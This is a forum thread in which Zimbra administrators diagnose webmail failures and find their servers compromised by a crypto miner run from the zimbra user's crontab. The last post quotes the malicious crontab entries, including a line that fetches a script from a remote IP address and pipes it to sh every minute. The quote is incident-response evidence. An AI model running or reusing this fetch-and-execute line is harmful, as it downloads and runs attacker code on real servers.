Zimbra AJAX Webmail not loading

[faruque_bd]

We have faced the same problem after fixing the login issue.

We have fix the problem and it is working now

the permission of /opt/zimbra/data/tmp/upload directory has changed to 550, so the attachment file can not load.

change the folder permission to 750 and this will solve your problem.

Pls check the crontab of zimbra user and remove any unwanted line, you may find it at the bottom of the file

Thanks

[Klug]

Are you people running a patched (to the very last patch) version of ZCS?
Your servers might be compromised.

You should have a look at these :
viewtopic.php?t=66031
viewtopic.php?f=15&t=65932

The zmswatch binary you have in /opt/zimbra/log is definitively not a ZCS genuine file nor process.

[brillo61]

j122yka : Solved issue with upload refuse by :

chmod 755 /opt/zimbra/data/tmp/
chmod 755 /opt/zimbra/data/tmp/upload/

Cannot find unusual cron entries (looking with # crontab -e -u zimbra) and in the files under /opt/zimbra/conf/crontabs/
Changed root password after reboot.

Any help appreciated to find and clean the hack! Thank you!

(Zimbra 8.7.11_GA_1854, Ubuntu 16.04)

[MaySky]

i have zimbra 8.7.5. I have nothing unusual in crontab, only zmswatch.sh and this perrmissions error happened again twoday. Any idea why ?

zmswatch.sh is a crypto miner. Look at the "top" command. It is draining your CPU.
This file does not belong to Zimbra.

[Klug]

You're not fixing the hack until you have patched your server and clean it up fully.

[whyrukter]

I'm check my zimbra version

Code: Select all

Release 8.7.4.GA.1730.UBUNTU16.64 UBUNTU16_64 FOSS edition.

use top command have process
https://imgur.com/gbVCQms

and login user with zimbra use history command show this command
https://imgur.com/A3zr5D8

please help.

[koval1986]

I have the exact same problem as you.
.kthrotlds 400%

[saifulbd]

The solution posted by AB_Zimbra worked for me. Thanks!

[mmart]

i have zimbra 8.7.5. I have nothing unusual in crontab, only zmswatch.sh and this perrmissions error happened again twoday. Any idea why ?

zmswatch.sh is a crypto miner. Look at the "top" command. It is draining your CPU.
This file does not belong to Zimbra.

stoped zimbra, kill zmswatch process, removed in from crontab and remove files. No i have to upgrade to 8.8.12 ?

[efremovvk]

So, thanks for the tip on checking crontab, I found something slightly different to yours, right down the very bottom:

*/15 * * * * sh /opt/zimbra/log/zmswatch.sh;

It looks like it calls another executable file in /opt/zimbra/log/ called zmswatch

That was using 200% CPU. Killed it and removed the crontab entry.

Love to know the entry point for this, but we have an older version
Release 8.6.0_GA_1153.SLES11_64_20141215151129 SLES11_64 FOSS edition, Patch 8.6.0_P7.

Same
* * * * * wget -q -O - http://93.113.108.146:443/cr.sh | sh > /dev/null 2>&1
*/15 * * * * sh /opt/zimbra/log/zmswatch.sh;